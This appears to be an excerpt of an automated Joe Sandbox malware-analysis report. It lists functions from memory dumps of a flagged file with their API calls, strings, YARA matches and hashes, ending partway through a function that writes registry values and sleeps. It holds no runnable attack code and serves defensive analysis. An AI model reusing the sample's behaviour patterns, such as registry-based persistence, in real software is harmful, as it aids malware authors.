                        • Instruction ID: 6715a78ad53a010e1f654acf6738d2326510568a7b3af97ced4f43bd22a978ec
                        • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                        • Instruction Fuzzy Hash: 02B17E71520A08DFD714CF28C486BE57BE0FF85364F298659E899CF2A1C339D992CB45
                        Function 04965995 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04965990,?,?,00000008,?,?,0496C8F1,00000000), ref: 04965BC2
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionRaise
                        • String ID:
                        • API String ID: 3997070919-0
                        • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                        • Instruction ID: 37b66c8a5b174f84119a405ac626fca93bf80b2d5222919d4895e9e067cff068
                        • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                        • Instruction Fuzzy Hash: 95B14C31610609EFD715CF28D48AB657BE5FF45364F2A8668E89ACF2A1C335E981CB40
                        Function 0040A2EC Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                        Download Yara Rule
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040A302
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FeaturePresentProcessor
                        • String ID:
                        • API String ID: 2325560087-0
                        • Opcode ID: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                        • Instruction ID: 655f466d2002f1984def2d585099db1cc9528c498776e59a8b59a497753dfce5
                        • Opcode Fuzzy Hash: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                        • Instruction Fuzzy Hash: 4C5136B1E10315CFDB24CF95D8857AABBF0FB48314F24803AD905EB3A1D37899568B99
                        Function 00417727 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                        • Instruction ID: 0da0f6d43ac66bea4d05f4cd5f3fcaee254ac53de518b98f89be5a9909b1102a
                        • Opcode Fuzzy Hash: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                        • Instruction Fuzzy Hash: 7B41B4B5C0421CAEDF20DF69CC89AEABBB8AF44304F1442DEE419D3241DA389E85CF54
                        Function 0496798E Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                        • Instruction ID: 6ce3d29f1addcd5865124b50645f19d2d3168d78503cf37b07ed9f9ec5b030e6
                        • Opcode Fuzzy Hash: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                        • Instruction Fuzzy Hash: 05419875804219AFDF20DFA9CC88AEABBBDEF45304F5442E9E41DD3210D634AE458F50
                        Function 0040EF09 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
                        • Instruction ID: a862614980e7782cfb360a41e62bb903fc37a91afa162c473b4857922a947482
                        • Opcode Fuzzy Hash: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
                        • Instruction Fuzzy Hash: DDC1EE309006079ECB34CE69C584A7BBBB1AB45304F144A7FD856B7BD2C339AD0ACB59
                        Function 0495F170 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                        • Instruction ID: c95cf3e44fa5be73fa5546c9f640b65e0a252bf705298eeb8bd518642b659b28
                        • Opcode Fuzzy Hash: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                        • Instruction Fuzzy Hash: 44C1F1746006068FDB24DF68C584A7ABBBABF85324F344A39DC529B6B8D330B945CB11
                        Function 00473BFE Relevance: 1.6, Strings: 1, Instructions: 328COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: NTDL
                        • API String ID: 0-3662016964
                        • Opcode ID: 68ffc6f7c16a3755baa9feff4ae7b730aa7b5e7bea3f02f354cf1d25802d90fc
                        • Instruction ID: 6fdb32ee8271b1bfff67b1b68c0b8a9f58d6da88e7ce107a0e3a810a91a6e6d7
                        • Opcode Fuzzy Hash: 68ffc6f7c16a3755baa9feff4ae7b730aa7b5e7bea3f02f354cf1d25802d90fc
                        • Instruction Fuzzy Hash: F9A1037290824A8FDB11CF24C5001EF7BE0EB86321F24856FD84A97602C77A5E12EF5E
                        Function 0040EBC7 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
                        • Instruction ID: c83ad001e3c04e1f23fe5313526111bf351830610e2bf169758c16327f184a9c
                        • Opcode Fuzzy Hash: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
                        • Instruction Fuzzy Hash: 3EB1E47090460B8BDB248E6AC555ABFB7A1AF41304F140E3FD452B77C1C73EAD268B89
                        Function 0495EE2E Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                        • Instruction ID: edf423b0465f1d23475e2251ffc5719d895b757c228e9e29fdb9d76060ca5e65
                        • Opcode Fuzzy Hash: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                        • Instruction Fuzzy Hash: 6CB1E570A0460A8BDF24DF68C958ABEB7A9EF44314F34063DDC52976B4DB32B605CB51
                        Function 0040A720 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                        Download Yara Rule
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(Function_0000A72C,0040A0A4), ref: 0040A725
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                        • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                        • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                        • Instruction Fuzzy Hash:
                        Function 0495A987 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                        Download Yara Rule
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(0040A72C,0495A30B), ref: 0495A98C
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                        • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                        • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                        • Instruction Fuzzy Hash:
                        Function 00499BD4 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: zcOo
                        • API String ID: 0-3317417374
                        • Opcode ID: 56810a7f709042865be1a1e3180df6646b27347468d488eb65d00b70c1e2fc00
                        • Instruction ID: d1a5db4657572b10ea6f000a736268ed0fcfd456fb8c8cb67aecb3855fb3ebec
                        • Opcode Fuzzy Hash: 56810a7f709042865be1a1e3180df6646b27347468d488eb65d00b70c1e2fc00
                        • Instruction Fuzzy Hash: D351F3B3A142104BF314AD7CDC94B6BB696DBC8720F1B863DDAC8D7784D9395C058292
                        Function 005566DA Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: b~4
                        • API String ID: 0-4026842869
                        • Opcode ID: 655978e0ec8c6a53dc9926f97f46f3e9b53a5a7d4e484a7dbaabe400d44eb3d2
                        • Instruction ID: 736ea6e3176497c56abbd866e4038c60de7241d6444c6244f03a13f18448b548
                        • Opcode Fuzzy Hash: 655978e0ec8c6a53dc9926f97f46f3e9b53a5a7d4e484a7dbaabe400d44eb3d2
                        • Instruction Fuzzy Hash: 055129F3B083009BE3086E2DED5577ABBE9DBD4734F2A063DE685C3380E93958058656
                        Function 00536211 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: *4;
                        • API String ID: 0-3811199015
                        • Opcode ID: fdded339e367ddeb18455329a0b27698f421128272ad5cd14850b775a3fdb2ba
                        • Instruction ID: 05f97a77a7d55e1807243c7d27ce5bea747c3a21349a780f3064f7e6aa471d9e
                        • Opcode Fuzzy Hash: fdded339e367ddeb18455329a0b27698f421128272ad5cd14850b775a3fdb2ba
                        • Instruction Fuzzy Hash: 674126F3E082045BF318AA38DC8933677D6DB94320F2B863DDA98877C4ED395C058286
                        Function 00418592 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: HeapProcess
                        • String ID:
                        • API String ID: 54951025-0
                        • Opcode ID: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
                        • Instruction ID: 3c2d4b823819c0ef79fadcf046fefbcb2a87197a19d2065c9f8a0fe70da1ab12
                        • Opcode Fuzzy Hash: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
                        • Instruction Fuzzy Hash: 80A02230B00200CF83208F32EE0830C3EF8FB8C2C0300C038A000C0232EB3880828B08
                        Function 00415E59 Relevance: .6, Instructions: 637COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                        • Instruction ID: 2119cb9e33fec53289003fbb8559c0bd9e138a5c3f232e450aa7d4159409e329
                        • Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                        • Instruction Fuzzy Hash: 91320331E29F014DD7239A34D922336A649AFB73D4F56D737E819B5AA9EF28C4C34108
                        Function 004C0714 Relevance: .2, Instructions: 200COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1af11d416a89fb02a18e9b79d43073afecc6e4f5267925e612be5243a03cf2ed
                        • Instruction ID: 5d2e2f59ddcbbe3530ec86ce2cf4296c667cccf74c6bc9b778fe806799a92f54
                        • Opcode Fuzzy Hash: 1af11d416a89fb02a18e9b79d43073afecc6e4f5267925e612be5243a03cf2ed
                        • Instruction Fuzzy Hash: D361B7F39087149FE304AE29D885369FBE1EF94310F26893DDAC897384E6395845CB87
                        Function 004C19B8 Relevance: .2, Instructions: 152COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a0a958fbd1bf155bfd71185c0b4243e2167b282684c165a6b26c8d8c8dcd8c4
                        • Instruction ID: e5e6c29f537754a40f396f923a898d9c0e18ccb9f126eca8b455101087a15886
                        • Opcode Fuzzy Hash: 2a0a958fbd1bf155bfd71185c0b4243e2167b282684c165a6b26c8d8c8dcd8c4
                        • Instruction Fuzzy Hash: 4F4129F3A083145BF314A97DEC85736B6C6DB94320F2B463CEA99D77C5E8396C058292
                        Function 004C2118 Relevance: .1, Instructions: 145COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ad99483222e12994c5e013d85722e7cb0245fe04c3142041656bafe3afa6e51
                        • Instruction ID: abf16350a714903734db6ffcd60811d5253a0de73562cad6af6afdb73a1cbb2c
                        • Opcode Fuzzy Hash: 6ad99483222e12994c5e013d85722e7cb0245fe04c3142041656bafe3afa6e51
                        • Instruction Fuzzy Hash: F54145B3B085048FE3086A6EEC6177AB6DEEBD8330F6A023EA559D33C4EC755C014285
                        Function 005BD28E Relevance: .1, Instructions: 115COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bc7ece833c8f1fc0b53a9c1e96beb496050a3ebe75cd25d6aaddfd3e146bffcc
                        • Instruction ID: dc2dd5a368b4bda1f34d05ee807aae43895fadf7abf049ee120ec7781be52669
                        • Opcode Fuzzy Hash: bc7ece833c8f1fc0b53a9c1e96beb496050a3ebe75cd25d6aaddfd3e146bffcc
                        • Instruction Fuzzy Hash: 9C41A0B2A086009FE3106E28DC8572AF7E6EFA4350F2B493CD6C893244E63959518B87
                        Function 0040B6D0 Relevance: .1, Instructions: 76COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction ID: ca795268159c21d128c013142cdfc2d9b79cbc1da2bbaf958516ecc3655a5718
                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction Fuzzy Hash: 39113DBB24014243D614873DD9F49B7A395EBC5320B2D437BD1416B7D4D33AE9459A8C
                        Function 0495B937 Relevance: .1, Instructions: 76COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction ID: 31093a781ad63aed303cabcd308a4e0756b12fe3fa5f3aaf202d1ed763eb6600
                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction Fuzzy Hash: D91127B720018247D655CA3ED4B42B6E79DEFC6329B3C477AD8858B77AD222B144D700
                        Function 047A7D41 Relevance: .1, Instructions: 61COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842703347.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_47a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                        • Instruction ID: 08771eb7056d114c5da39982fe0a0733143f4f69ed40c61d8a9fd9b91280a921
                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                        • Instruction Fuzzy Hash: 8C1182723401009FD754DF65DC90FA673EAEBC9220B198156ED04CB315E675FC11C760
                        Function 04950D90 Relevance: .0, Instructions: 43COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                        • Instruction ID: cacfbc0c46e98c86a351d82b4132ac5c712cceccaeed7baca1d735253631f30a
                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                        • Instruction Fuzzy Hash: 3401A276A006049FDF21CF24C818BAA33E9EB86316F6544B5ED0A9B291E774B9458F90
                        Function 0070920C Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000703000.00000040.00000001.01000000.00000003.sdmp, Offset: 00703000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_703000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2b4f1e442cb820e5bf7a10184b81529133126d016388fb056b3004b24611545f
                        • Instruction ID: 4282d8ab57689e6923b05700e77f19250f14946f8aadc882be9c5bf80440b33a
                        • Opcode Fuzzy Hash: 2b4f1e442cb820e5bf7a10184b81529133126d016388fb056b3004b24611545f
                        • Instruction Fuzzy Hash: BAD02211A7D3C3AAD343E734CC984A1BFA0BC5B34839801EE80808F487EB1B6025DBD1
                        Function 00409BDD Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409BBB), ref: 00409BE9
                        • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409BBB), ref: 00409BF4
                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409BBB), ref: 00409C05
                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409C17
                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409C25
                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409BBB), ref: 00409C48
                        • DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409BBB), ref: 00409C64
                        • CloseHandle.KERNEL32(00000000,?,?,00409BBB), ref: 00409C74
                        Strings
                        • SleepConditionVariableCS, xrefs: 00409C11
                        • kernel32.dll, xrefs: 00409C00
                        • WakeAllConditionVariable, xrefs: 00409C1D
                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BEF
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                        • API String ID: 2565136772-3242537097
                        • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                        • Instruction ID: 8f8b07cbf63392261d8dc325579aef03bb655b7cde116df0e27078c5153b7531
                        • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                        • Instruction Fuzzy Hash: 6F015271F48711ABE7205BB4BD09F562BD8AB49705B554032BA05E22A2DB78CC068A6C
                        Function 0041C3CF Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CECF), ref: 0041C3E8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: DecodePointer
                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                        • API String ID: 3527080286-3064271455
                        • Opcode ID: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                        • Instruction ID: a42e5d16fde1fbafe1f90c690df07fce043cce1a805407c3827f836c313506d5
                        • Opcode Fuzzy Hash: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                        • Instruction Fuzzy Hash: 2D51AD7198022AEBCB108F58EE8C1FE7F72FB44304F908057D481A6654C7BC99A6CB9D
                        Function 0040BCFB Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • type_info::operator==.LIBVCRUNTIME ref: 0040BE1A
                        • ___TypeMatch.LIBVCRUNTIME ref: 0040BF28
                        • _UnwindNestedFrames.LIBCMT ref: 0040C07A
                        • CallUnexpected.LIBVCRUNTIME ref: 0040C095
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                        • String ID: csm$csm$csm
                        • API String ID: 2751267872-393685449
                        • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                        • Instruction ID: 33f924a654f9d1b13218269df17d2698b0e91053480f28ff55db22427738ff3f
                        • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                        • Instruction Fuzzy Hash: 38B1767180020AEFCF24DFA5C9819AEB7B5EF04314B14426BE9057B292D739EA51CFD9
                        Function 0495BF62 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • type_info::operator==.LIBVCRUNTIME ref: 0495C081
                        • ___TypeMatch.LIBVCRUNTIME ref: 0495C18F
                        • _UnwindNestedFrames.LIBCMT ref: 0495C2E1
                        • CallUnexpected.LIBVCRUNTIME ref: 0495C2FC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                        • String ID: csm$csm$csm
                        • API String ID: 2751267872-393685449
                        • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                        • Instruction ID: 49a077c02193fad4963031e610288ab3dde81cabf894039e6f2048b220070edb
                        • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                        • Instruction Fuzzy Hash: 9DB11671800309AFDF29DFA4D8809AEBBB9BF44314F24456AEC156B221D771FA91CB91
                        Function 004058F0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 122registrysleepCOMMON
                        Download Yara Rule
                        APIs
                        • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                        • Sleep.KERNEL32(000003E8), ref: 00405AB0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateOpenSleepValue
